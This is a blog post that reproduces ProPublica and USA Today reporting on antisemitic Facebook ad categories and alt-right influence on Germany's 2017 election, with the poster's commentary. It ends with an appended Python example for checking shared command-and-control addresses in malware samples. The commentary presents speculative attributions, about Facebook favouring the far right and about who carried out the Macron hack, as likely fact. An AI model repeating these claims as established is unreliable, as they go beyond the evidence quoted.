    Facebook Enabled Advertisers to Reach ‘Jew Haters’
    After being contacted by ProPublica, Facebook removed several anti-Semitic ad categories and promised to improve monitoring.

    by Julia Angwin, Madeleine Varner and Ariana Tobin
    Sept. 14, 4 p.m. EDT

    Want to market Nazi memorabilia, or recruit marchers for a far-right rally? Facebook’s self-service ad-buying platform had the right audience for you.

    Until this week, when we asked Facebook about it, the world’s largest social network enabled advertisers to direct their pitches to the news feeds of almost 2,300 people who expressed interest in the topics of “Jew hater,” “How to burn jews,” or, “History of ‘why jews ruin the world.’”

    To test if these ad categories were real, we paid $30 to target those groups with three “promoted posts” — in which a ProPublica article or post was displayed in their news feeds. Facebook approved all three ads within 15 minutes.

    After we contacted Facebook, it removed the anti-Semitic categories — which were created by an algorithm rather than by people — and said it would explore ways to fix the problem, such as limiting the number of categories available or scrutinizing them before they are displayed to buyers.

    “There are times where content is surfaced on our platform that violates our standards,” said Rob Leathern, product management director at Facebook. “In this case, we’ve removed the associated targeting fields in question. We know we have more work to do, so we’re also building new guardrails in our product and review processes to prevent other issues like this from happening in the future.”

    Facebook’s advertising has become a focus of national attention since it disclosed last week that it had discovered $100,000 worth of ads placed during the 2016 presidential election season by “inauthentic” accounts that appeared to be affiliated with Russia.

    Like many tech companies, Facebook has long taken a hands off approach to its advertising business. Unlike traditional media companies that select the audiences they offer advertisers, Facebook generates its ad categories automatically based both on what users explicitly share with Facebook and what they implicitly convey through their online activity.

    Traditionally, tech companies have contended that it’s not their role to censor the Internet or to discourage legitimate political expression. In the wake of the violent protests in Charlottesville by right-wing groups that included self-described Nazis, Facebook and other tech companies vowed to strengthen their monitoring of hate speech.

    Facebook CEO Mark Zuckerberg wrote at the time that “there is no place for hate in our community,” and pledged to keep a closer eye on hateful posts and threats of violence on Facebook. “It’s a disgrace that we still need to say that neo-Nazis and white supremacists are wrong — as if this is somehow not obvious,” he wrote.

    But Facebook apparently did not intensify its scrutiny of its ad buying platform. In all likelihood, the ad categories that we spotted were automatically generated because people had listed those anti-Semitic themes on their Facebook profiles as an interest, an employer or a “field of study.” Facebook’s algorithm automatically transforms people’s declared interests into advertising categories.

    Here is a screenshot of our ad buying process on the company’s advertising portal:
    [see screenshot]

    This is not the first controversy over Facebook’s ad categories. Last year, ProPublica was able to block an ad that we bought in Facebook’s housing categories from being shown to African-Americans, Hispanics and Asian-Americans, raising the question of whether such ad targeting violated laws against discrimination in housing advertising. After ProPublica’s article appeared, Facebook built a system that it said would prevent such ads from being approved.

    Last year, ProPublica also collected a list of the advertising categories Facebook was providing to advertisers. We downloaded more than 29,000 ad categories from Facebook’s ad system — and found categories ranging from an interest in “Hungarian sausages” to “People in households that have an estimated household income of between $100K and $125K.”

    At that time, we did not find any anti-Semitic categories, but we do not know if we captured all of Facebook’s possible ad categories, or if these categories were added later. A Facebook spokesman didn’t respond to a question about when the categories were introduced.

    Last week, acting on a tip, we logged into Facebook’s automated ad system to see if “Jew hater” was really an ad category. We found it, but discovered that the category — with only 2,274 people in it — was too small for Facebook to allow us to buy an ad pegged only to Jew haters.

    Facebook’s automated system suggested “Second Amendment” as an additional category that would boost our audience size to 119,000 people, presumably because its system had correlated gun enthusiasts with anti-Semites.

    Instead, we chose additional categories that popped up when we typed in “jew h”: “How to burn Jews,” and “History of ‘why jews ruin the world.’” Then we added a category that Facebook suggested when we typed in “Hitler”: a category called “Hitler did nothing wrong.” All were described as “fields of study.”

    These ad categories were tiny. Only two people were listed as the audience size for “how to burn jews,” and just one for “History of ‘why jews ruin the world.’” Another 15 people comprised the viewership for “Hitler did nothing wrong.”

    Facebook’s automated system told us that we still didn’t have a large enough audience to make a purchase. So we added “German Schutzstaffel,” commonly known as the Nazi SS, and the “Nazi Party,” which were both described to advertisers as groups of “employers.” Their audiences were larger: 3,194 for the SS and 2,449 for Nazi Party.

    Still, Facebook said we needed more — so we added people with an interest in the National Democratic Party of Germany, a far-right, ultranationalist political party, with its much larger viewership of 194,600.

    Once we had our audience, we submitted our ad — which promoted an unrelated ProPublica news article. Within 15 minutes, Facebook approved our ad, with one change. In its approval screen, Facebook described the ad targeting category “Jew hater” as “Antysemityzm,” the Polish word for anti-Semitism. Just to make sure it was referring to the same category, we bought two additional ads using the term “Jew hater” in combination with other terms. Both times, Facebook changed the ad targeting category “Jew hater” to “Antisemityzm” in its approval.

    Here is one of our approved ads from Facebook:
    [see screenshot]

    A few days later, Facebook sent us the results of our campaigns. Our three ads reached 5,897 people, generating 101 clicks, and 13 “engagements” — which could be a “like” a “share” or a comment on a post.

    Since we contacted Facebook, most of the anti-Semitic categories have disappeared.

    Facebook spokesman Joe Osborne said that they didn’t appear to have been widely used. “We have looked at the use of these audiences and campaigns and it’s not common or widespread,” he said.

    ———-

    “Facebook Enabled Advertisers to Reach ‘Jew Haters’” by Julia Angwin, Madeleine Varner and Ariana Tobin; Propublica; 09/14/2017

    “To test if these ad categories were real, we paid $30 to target those groups with three “promoted posts” — in which a ProPublica article or post was displayed in their news feeds. Facebook approved all three ads within 15 minutes.”

    $30 to advertise to Facebook’s “Jew Haters”. And it was approved in 15 minutes. But it wasn’t just the “Jew Haters” targeted with this $30 ad buy because there weren’t enough to meet the minimum number of people Facebook requires for these kinds of purchases. So other categories had to be added. Categories apparently generated automatically based on user activity:


    After we contacted Facebook, it removed the anti-Semitic categories — which were created by an algorithm rather than by people — and said it would explore ways to fix the problem, such as limiting the number of categories available or scrutinizing them before they are displayed to buyers.

    And it wasn’t until Propublica added the category for Germany’s neo-Nazi National Democratic Party (NPD) that they finally had enough people in their collection of hate categories to meet the minimum number of target Facebook users required for the ad buy to be placed:


    Last week, acting on a tip, we logged into Facebook’s automated ad system to see if “Jew hater” was really an ad category. We found it, but discovered that the category — with only 2,274 people in it — was too small for Facebook to allow us to buy an ad pegged only to Jew haters.

    Facebook’s automated system suggested “Second Amendment” as an additional category that would boost our audience size to 119,000 people, presumably because its system had correlated gun enthusiasts with anti-Semites.

    Instead, we chose additional categories that popped up when we typed in “jew h”: “How to burn Jews,” and “History of ‘why jews ruin the world.’” Then we added a category that Facebook suggested when we typed in “Hitler”: a category called “Hitler did nothing wrong.” All were described as “fields of study.”

    These ad categories were tiny. Only two people were listed as the audience size for “how to burn jews,” and just one for “History of ‘why jews ruin the world.’” Another 15 people comprised the viewership for “Hitler did nothing wrong.”

    Facebook’s automated system told us that we still didn’t have a large enough audience to make a purchase. So we added “German Schutzstaffel,” commonly known as the Nazi SS, and the “Nazi Party,” which were both described to advertisers as groups of “employers.” Their audiences were larger: 3,194 for the SS and 2,449 for Nazi Party.

    Still, Facebook said we needed more — so we added people with an interest in the National Democratic Party of Germany, a far-right, ultranationalist political party, with its much larger viewership of 194,600.

    “Still, Facebook said we needed more — so we added people with an interest in the National Democratic Party of Germany, a far-right, ultranationalist political party, with its much larger viewership of 194,600.”

    In a way it’s at least a little relieving that categories like “Hitler did nothing wrong” only had 15 users Facebook identified as a target audience for that category. It could be worse! Like, say 194,600 users, which is the number of people in the NPD target audience. But it’s also pretty disturbing that Facebook made it so cheap and easy to target this global hate audience.

    And, again, at best this really was just an algorithmic ‘oops’, but we can’t rule out the possibility that a corporate giant like Facebook, which has the far-right figurehead Peter Thiel on its board, is quietly trying to capture and foster far-right audiences.

    But according to Facebook this was all an innocent mistake. Let’s hope so. And let’s also hope the sudden discovery that Facebook in Germany has been prioritizing far-right political parties like the AfD when people search for political discussions was also just an innocent mistake. As the following article notes, it’s one of the many discoveries about the role the ‘Alt-Right’ is playing in Germany’s current elections, and it’s a role that doesn’t appear to include a Kremlin counterpart, despite widespread fears that all sorts of Russian dirty tricks were inevitably going to be injected into the race. As far as observers can tell, it’s just the ‘Alt-Right’ that’s flooding German social media sites with far-right messages, and it specifically appears to be American ‘Alt-Right’ people doing this. Apparently with the help of another Facebook pro-far-right ‘whoops! How did that happen?’:

    USA Today

    There is meddling in Germany’s election — not by Russia, but by U.S. right wing

    Kim Hjelmgaard, Published 11:31 a.m. ET Sept. 20, 2017

    Less than a week before Sunday’s vote that is likely to hand German Chancellor Angela Merkel a fourth term, evidence of anticipated Russian meddling has yet to materialize, but U.S. right-wing groups have interfered, according to German researchers.

    “So far we have not been able to track down any specific Russian activity,” said Simon Hegelich, a professor of political science data at the Technical University of Munich who has advised the German government about the threat of hacking and fake news.

    Instead, Hegelich and others point to an alliance of mostly anonymous online trolls and extremist agitators who are disseminating right-wing materials through YouTube; messaging board sites like 4chan and reddit; and Gab.ai, a texting service.

    “A lot of the stuff we are seeing in Germany can be linked to, or is at least inspired by, the ‘alt-right’ movement in the U.S.,” Hegelich said, referring to a loosely defined group whose far-right ideology includes racism, populism and white nationalism.

    He said proving connections among sympathizers is extremely difficult and may never be conclusive. But an analysis of 300 million tweets over the past six months by Hegelich and researchers at the Technical University of Munich shows Germany is a hotspot for posts that use the hashtag “#AltRight.”

    Many denigrate both leading candidates — Merkel and her conservative Christian Democratic Union party, and her chief rival, Martin Schulz of the left-of-center Social Democratic Party — with the hashtags #Merkel and #Schulz.

    And many of those posts originate in the U.S., adding to the impression that right-wing social media users in both countries may be trying to sway German public opinion. It’s possible that some of this alt-right messaging coming out of the U.S. may be connected to Russian interference; that, too, is difficult to determine, Hegelich said.

    “There will never be an election again in which trolling, hacking and extreme far-right politics do not play a role,” Andrew Auernheimer, a hacker and blogger for the U.S. neo-Nazi Daily Stormer website wrote after Donald Trump’s election victory last year.

    The Daily Stormer has been available intermittently since August after major technology firms including Google forced the site offline for comments about the death of Heather Heyer by an alt-right protester in Charlottesville, Va. Nevertheless, the website continues to publish commentaries about the German election.

    “There is essentially no chance that the AfD (Alternative for Germany party) can win this election,” Adrian Sol wrote Sunday on the site, referring to Germany’s far-right anti-immigration and anti-European Union party.

    “However, if they can keep putting pressure on the establishment and change the narrative, (there) may be hope yet that Germany can some day be saved.”

    A report published Wednesday by Hope Not Hate, a British anti-racism watchdog, concluded that the alt-right movement has “breathed life and youth back into formerly declining and dormant parts of the European extreme right.”

    The report, based on an undercover investigation of far-right figureheads, found that extremist individuals, organizations, websites and forums on both sides of the Atlantic are increasingly engaging with one another and “weaponizing” the Internet.

    Sandro Gaycken, the founder and director of the Berlin-based Digital Society Institute, said right-wing voices are trying to infiltrate conversations about the German election on Facebook and other social media platforms.

    One example: Gaycken said for the past two months, new and existing Facebook users in Germany who search for political discussion groups on the social media platform have been automatically given recommendations that prioritize right-wing parties such as AfD, expected to enter the country’s national parliament for the first time after Sunday’s vote.

    “It’s really strange because Facebook says this should be impossible because you are only supposed to get recommendations based on your own ‘friends,’ ‘groups’ and ‘likes.’ But everyone in Germany is getting these right-wing party recommendations,” he said.

    “Even left-wing journalists.”

    In a statement, Facebook said it was aware of the issue reported in Germany and that it was related to its “Groups Discover” feature, and that it has now temporarily turned off the category “news and politics” in the “Discover” tab while it investigates the matter.

    Facebook said it was also examining the accounts of apparently fake users who purchased Facebook ads during the U.S. election. These accounts were subsequently linked to the pro-Kremlin troll farm known as the Internet Research Agency. Facebook said that it has not yet uncovered similar ad purchases related to the German vote.

    “We haven’t seen any trace of the Russians, just right-wingers,” Gaycken added.

    According to polls published by German media Sunday, Merkel’s party is projected to win 36% of the vote, well ahead of Schulz’s SPD on 22%. AfD is forecast to come in third, with 11%. If Merkel wins, she could forge ahead with plans to pursue closer political and economic union with EU members, a policy as deeply unpopular with AfD’s supporters as her decision to open Germany’s borders to 1 million refugees since 2015.

    Germany’s vulnerability to political hackers, Internet trolls and bots linked to Russia is hard to gauge. Plus, there may not be much point doing so, according to Mark Galeotti, who runs the Center for European Security, a research institute in Prague.

    “There is no ‘pro-Putin’ candidate,” he said.

    “Any interference would be unlikely to have any substantive impact on the election result and only harden Germany’s position against Moscow.”

    Merkel has nevertheless sought to blunt potential Russian interference through aggressive public information campaigns, by establishing additional cybersecurity agencies and strategies and by ushering in the Network Enforcement Act, a law that, come this October, will fine social media companies up to $57 million if they do not remove hate speech, defamation and incitements to violence within 24 hours.

    German political parties also pledged not to use social bots in the election campaign, and independent media monitoring organizations such as Correctiv, which debunk fake news and call out disinformation, have been established recently.

    The government has insisted the software used to tabulate votes — paper ballots are hand-counted and then passed to regional authorities — is secure despite a study published Sept. 7 by the Chaos Computer Club, a German technology watchdog, showing the system’s encryption method was outdated and vulnerable to manipulation.

    But what may seem like a lack of interest from Moscow may just be a sign of success.

    “I think there is more Russian activity than meets the eye,” said Joerg Forbrig, a Berlin-based political affairs expert at the German Marshall Fund of the United States, a public policy think tank whose Alliance for Securing Democracy unit built an online tool that tracks Russian propaganda and disinformation efforts. Its “Hamilton 68” dashboard analyzes about 600 Twitter accounts directly controlled by Russia, by users who promote Russian themes, and by users and topics Russia seeks to discredit or attack.

    “In the past we have seen a very systematic and skilled outreach program into Germany’s Russian-speaking population. This was first tested in state elections in Berlin last September. In those areas where there are very high numbers of Russian speakers living in Berlin, the AfD’s vote share was up to 35%,” Forbrig said.

    He said these campaigns involved circulating posters and leaflets with messages that were inimical to the German government’s position on Russian sanctions or NATO.

    Forbrig said there could be forms of Russian support for the AfD not yet recognized.

    The Alliance for Securing Democracy has concluded that Russia has meddled in the affairs of at least 27 European and North American countries since 2004 with interference that ranges from cyberattacks to disinformation campaigns.

    In 2015, a Russian-intelligence-linked hacking group called Fancy Bear stole data from German parliamentarians, including Merkel. This data has yet to be released to the public. Fancy Bear is the same group thought to be behind the hacks of the Democratic National Committee in the run up to the U.S. election. Moscow repeatedly has dismissed allegations it intervenes in elections as anti-Russian propaganda.

    Still, Forbrig added the German election may be less susceptible to outside influence for three reasons: Voters watched alleged Russian meddling take place in the U.S. and French elections, which has led to high levels of awareness; Germany’s multi-party electoral system makes it more difficult to predict how messages and information targeted at one group might impact others; and Germany’s media is, Forbrig said, generally more “balanced and calm” and lacks “shrill voices” compared to its counterparts elsewhere. Further, its media is still viewed as a trusted source of information — not always the case in President Trump’s Washington.

    ———–

    “There is meddling in Germany’s election — not by Russia, but by U.S. right wing” by Kim Hjelmgaard; USA Today; 09/20/2017

    “‘So far we have not been able to track down any specific Russian activity,’ said Simon Hegelich, a professor of political science data at the Technical University of Munich who has advised the German government about the threat of hacking and fake news.”

    No Russian nefariousness to be found. Phew! Oh wait:


    Instead, Hegelich and others point to an alliance of mostly anonymous online trolls and extremist agitators who are disseminating right-wing materials through YouTube; messaging board sites like 4chan and reddit; and Gab.ai, a texting service.

    “A lot of the stuff we are seeing in Germany can be linked to, or is at least inspired by, the ‘alt-right’ movement in the U.S.,” Hegelich said, referring to a loosely defined group whose far-right ideology includes racism, populism and white nationalism.

    He said proving connections among sympathizers is extremely difficult and may never be conclusive. But an analysis of 300 million tweets over the past six months by Hegelich and researchers at the Technical University of Munich shows Germany is a hotspot for posts that use the hashtag “#AltRight.”

    Many denigrate both leading candidates — Merkel and her conservative Christian Democratic Union party, and her chief rival, Martin Schulz of the left-of-center Social Democratic Party — with the hashtags #Merkel and #Schulz.

    And many of those posts originate in the U.S., adding to the impression that right-wing social media users in both countries may be trying to sway German public opinion. It’s possible that some of this alt-right messaging coming out of the U.S. may be connected to Russian interference; that, too, is difficult to determine, Hegelich said.

    Yep, the Alt-Right doesn’t need the Kremlin’s troll farm to get its message out. The ‘Alt-Right’ is a troll farm. A virtual troll farm that has its sights set on ensuring the AfD and other far-right parties do as well as possible.

    And this virtual troll farm has had some big help apparently. From Facebook of course:


    Sandro Gaycken, the founder and director of the Berlin-based Digital Society Institute, said right-wing voices are trying to infiltrate conversations about the German election on Facebook and other social media platforms.

    One example: Gaycken said for the past two months, new and existing Facebook users in Germany who search for political discussion groups on the social media platform have been automatically given recommendations that prioritize right-wing parties such as AfD, expected to enter the country’s national parliament for the first time after Sunday’s vote.

    “It’s really strange because Facebook says this should be impossible because you are only supposed to get recommendations based on your own ‘friends,’ ‘groups’ and ‘likes.’ But everyone in Germany is getting these right-wing party recommendations,” he said.

    “Even left-wing journalists.”

    In a statement, Facebook said it was aware of the issue reported in Germany and that it was related to its “Groups Discover” feature, and that it has now temporarily turned off the category “news and politics” in the “Discover” tab while it investigates the matter.

    Facebook said it was also examining the accounts of apparently fake users who purchased Facebook ads during the U.S. election. These accounts were subsequently linked to the pro-Kremlin troll farm known as the Internet Research Agency. Facebook said that it has not yet uncovered similar ad purchases related to the German vote.

    “We haven’t seen any trace of the Russians, just right-wingers,” Gaycken added.

    “‘It’s really strange because Facebook says this should be impossible because you are only supposed to get recommendations based on your own ‘friends,’ ‘groups’ and ‘likes.’ But everyone in Germany is getting these right-wing party recommendations,’ he said.”

    Everyone in Germany is getting right-wing parties recommended to them on Facebook. And apparently this is only the case for right-wing parties. Another algorithmic ‘oops!’? Is the virtual troll farm somehow gaming the system? Or is Facebook actually quietly trying to use its immense power to promote the far-right? It’s a question we’re once again forced to ask.

    Another thing we should keep in mind is related to the Bundestag hack of 2015, an example of a high-profile political hack from Russia that Germany has already had to deal with:


    In 2015, a Russian-intelligence-linked hacking group called Fancy Bear stole data from German parliamentarians, including Merkel. This data has yet to be released to the public. Fancy Bear is the same group thought to be behind the hacks of the Democratic National Committee in the run up to the U.S. election. Moscow repeatedly has dismissed allegations it intervenes in elections as anti-Russian propaganda.

    That 2015 hack isn’t just related to the DNC hack because Fancy Bear was attributed with the hack in both cases. They’re also related by the fact that the same command and control server was used in both hacks. And we know this because both hacks utilized unencrypted malware that inexplicably hard-coded the IP address of the command and control server, and that command and control server was apparently utilizing a version of OpenSSL that would have made it vulnerable to the Heartbleed attack. In other words, the command and control server that was used for both the Bundestag hack of 2015 and the DNC hack of 2016 was vulnerable to effectively being hijacked and shared by multiple hacking groups.

    Thus far there doesn’t appear to be a big hack impacting Germany’s election, and there isn’t much time left if it’s going to happen (the vote is on Sunday). But if there is, let’s not forget that, despite the fact that the big Macron hack in France’s elections continues to be routinely attributed to Russia in the US media and the NSA even said it was sure it was Russia, the French chief of cybersecurity said France had no evidence Russia did the hack, the NSA refused to provide France evidence of Russian attribution, and the publicly available evidence of how the hacked documents were leaked online strongly suggests that it was neo-Nazi hacker Andrew “the weev” Auernheimer who actually carried out the hack. So when you read a comment about how the French elections were hacked by Russians like this one…


    Still, Forbrig added the German election may be less susceptible to outside influence for three reasons: Voters watched alleged Russian meddling take place in the U.S. and French elections, which has led to high levels of awareness; Germany’s multi-party electoral system makes it more difficult to predict how messages and information targeted at one group might impact others; and Germany’s media is, Forbrig said, generally more “balanced and calm” and lacks “shrill voices” compared to its counterparts elsewhere. Further, its media is still viewed as a trusted source of information — not always the case in President Trump’s Washington.

    …don’t forget that the big Macron hack also appears to have American ‘Alt-Right’ neo-Nazi origins.

    Also note that, while the far-right troll army aggressively trying to get Marine Le Pen elected really was indeed comprised of French far-rightists, the National Front was using an ‘Alt-Right’ “Foreign Legion” on social media too.

    Which shouldn’t be too surprising. As Andrew Auernheimer told the world after Donald Trump’s victory:


    “There will never be an election again in which trolling, hacking and extreme far-right politics do not play a role,” Andrew Auernheimer, a hacker and blogger for the U.S. neo-Nazi Daily Stormer website wrote after Donald Trump’s election victory last year.

    Tragically, yep.

    Posted by Pterrafractyl | September 20, 2017, 11:09 pm
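
The shared command-and-control argument in the comment above (two samples that hard-code the same C2 address, on a server running a Heartbleed-affected OpenSSL) is the kind of claim an analyst checks mechanically. The following is an added editorial example, not code from the Spitfire List page or from the commenter, and it uses constructed sample bytes with RFC 5737 documentation addresses rather than any real malware or real server data; the OpenSSL banner for the shared server is likewise an assumption. It extracts plaintext IPv4 literals from unencrypted samples, finds infrastructure that more than one sample shares, and rates that overlap as weak evidence of a common operator whenever the shared server ran an OpenSSL release in the Heartbleed-affected range, since a server anyone could compromise does not tie two campaigns to one actor.

```python
"""Shared-C2 attribution check (added example, not the page's own material).

Extract hard-coded IPv4 C2 addresses from unencrypted binaries, find
addresses shared between samples, and flag shared servers whose OpenSSL
release falls in the Heartbleed-affected range (CVE-2014-0160).
"""
from __future__ import annotations

import ipaddress
import re

# Dotted quad that is not glued to other digits or dots, so the middle of a
# version string such as 4.0.30319.1 is not picked up. Octet range (0-255)
# is validated by ipaddress, not by the regex.
_IPV4_RE = re.compile(rb"(?<![\d.])(?:\d{1,3}\.){3}\d{1,3}(?![\d.])")


def extract_ipv4(blob: bytes) -> set[str]:
    """Return IPv4 literals embedded as plaintext in a binary blob.

    Loopback, unspecified, multicast, link-local and reserved addresses are
    dropped as noise (e.g. a bind to 127.0.0.1). Private and documentation
    ranges are kept on purpose: the constructed samples below use RFC 5737
    documentation addresses, and real samples do reach internal C2 via proxies.
    """
    found: set[str] = set()
    for match in _IPV4_RE.finditer(blob):
        text = match.group().decode("ascii")
        try:
            addr = ipaddress.IPv4Address(text)
        except ValueError:  # octet out of range, e.g. 999.1.1.1
            continue
        if (addr.is_loopback or addr.is_unspecified or addr.is_multicast
                or addr.is_link_local or addr.is_reserved):
            continue
        found.add(text)
    return found


def shared_infrastructure(samples: dict[str, bytes]) -> dict[str, set[str]]:
    """Map each C2 address found in more than one sample to those samples."""
    index: dict[str, set[str]] = {}
    for name, blob in samples.items():
        for addr in extract_ipv4(blob):
            index.setdefault(addr, set()).add(name)
    return {addr: names for addr, names in index.items() if len(names) > 1}


# OpenSSL 1.0.1 through 1.0.1f and 1.0.2-beta1 are affected; 1.0.1g and later,
# and the 0.9.8 / 1.0.0 lines, are not.
_HEARTBLEED_RE = re.compile(r"^1\.0\.1[a-f]?$|^1\.0\.2-beta1$")


def heartbleed_affected(openssl_version: str) -> bool:
    """True if the given OpenSSL version string is in the Heartbleed range."""
    return bool(_HEARTBLEED_RE.match(openssl_version.strip()))


def attribution_strength(samples: dict[str, bytes],
                         server_banners: dict[str, str]) -> dict[str, str]:
    """Rate each shared C2 address as evidence of a common operator.

    'weak'     - the server ran a Heartbleed-affected OpenSSL, so anyone could
                 have taken it over or shared it.
    'unknown'  - no banner is known for the server.
    'moderate' - otherwise. Shared infrastructure alone never rates 'strong'.
    """
    verdicts: dict[str, str] = {}
    for addr in shared_infrastructure(samples):
        banner = server_banners.get(addr)
        if banner is None:
            verdicts[addr] = "unknown"
        elif heartbleed_affected(banner):
            verdicts[addr] = "weak"
        else:
            verdicts[addr] = "moderate"
    return verdicts


# Constructed stand-ins for two unencrypted samples: header bytes, a loopback
# bind, a .NET-style version string that must NOT be extracted, an invalid
# octet, and plaintext C2 addresses from the RFC 5737 documentation ranges.
# Nothing here is real malware data.
SAMPLES = {
    "campaign_1": b"MZ\x90\x00pad 127.0.0.1 v4.0.30319.1 C2=203.0.113.10\x00 198.51.100.7\x00",
    "campaign_2": b"\x7fELF\x00pad 999.1.1.1 alt=203.0.113.10\x00 192.0.2.44\x00",
}
# Assumed banner for the shared server (an assumption, not an observation
# from the page): 1.0.1e is inside the Heartbleed-affected range.
SERVER_BANNERS = {"203.0.113.10": "1.0.1e"}

if __name__ == "__main__":
    for addr, names in shared_infrastructure(SAMPLES).items():
        print(addr, "shared by", sorted(names))
    print(attribution_strength(SAMPLES, SERVER_BANNERS))
```

Run as-is it reports that 203.0.113.10 is shared by both constructed samples and rates the overlap "weak" because of the assumed 1.0.1e banner; swap the banner for 1.0.1g and the same overlap rates "moderate". The point is the ordering of evidence: a shared address is a lead, and the server's own exposure decides how much weight that lead can carry.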
